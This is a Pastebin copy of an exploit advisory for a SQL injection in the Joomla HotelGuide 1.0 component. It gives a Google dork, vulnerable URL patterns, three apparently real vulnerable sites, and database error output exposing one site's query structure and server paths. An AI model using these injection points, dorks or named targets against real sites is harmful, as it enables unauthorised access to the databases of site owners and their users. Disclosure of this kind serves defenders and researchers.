Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla HotelGuide Components 1.0 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : joomla4ever.org
- # Software Download Link : joomla4ever.org/archive/ext/com_hotelguide.zip
- # Software Information Link : joomla4ever.org/extensions/ext-hotelguide
- # Software Version : 1.0
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_hotelguide''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010308
- packetstormsecurity.com/files/151425/Joomla-HotelGuide-1.0-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- " HotelGuide " is open source software for Joomla.
- Guide Hotelguide - a professional solution for travel agency or tour operator.
- GoogleMaps support with mini-images of each item by region.
- Text translation through an internal or external interface using Joomfish.
- You can upload a set of pictures for each hotel.
- ####################################################################
- # Impact :
- ***********
- Joomla HotelGuide 1.0 component for Joomla! is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_hotelguide&Itemid=[SQL Injection]
- /index.php?option=com_hotelguide&view=city&id=[SQL Injection]
- /index.php?option=com_hotelguide&Itemid=[ID-NUMBER]&view=city&id=[SQL Injection]
- /index.php?option=com_hotelguide&view=city&id=[ID-NUMBER]:[CITY-NAME-HERE]&Itemid=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] medidatravel.com/index.php?option=com_hotelguide&Itemid=28&view=city&id=10%27
- [+] agrituristabruzzo.it/index.php?option=com_hotelguide&view=city&id=34%27
- [+] hotelbg.info/index.php?option=com_hotelguide&view=city&id=6%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- No valid database connection You have an error in your SQL syntax; check the manual
- that corresponds to your MySQL server version for the right syntax to use near ''
- at line 1 SQL=SELECT s.id AS value, s.name AS text, s.image, cc.continent AS
- continent, cc.name AS countryname, CASE WHEN CHAR_LENGTH( s.alias )
- THEN CONCAT_WS( ':', s.id, s.alias ) ELSE s.id END AS slug FROM jos_hg_states
- AS s LEFT JOIN jos_hg_countries AS cc ON cc.id =
- s.country WHERE s.published = 1 AND s.country =
- Fatal error: Uncaught exception 'RuntimeException' with message 'Unknown column
- 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM
- `new2014_redirect_links` WHERE `old_url` = 'http://www.medidatravel.com
- /index.php?option=com_hotelguide&Itemid=28&view=city&id=10\'' LIMIT 0,
- 1' in /home/medidatr/public_html/libraries/joomla/database/driver/mysqli.php:610
- Stack trace: #0 /home/medidatr/public_html/libraries/joomla/database/driver.php
- (1279): JDatabaseDriverMysqli->execute() #1 /home/medidatr/public_html
- /plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject()
- #2 [internal function]: PlgSystemRedirect::handleError(Object(Exception))
- #3 {main} thrown in /home/medidatr/public_html/libraries
- /joomla/database/driver/mysqli.php on line 610
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment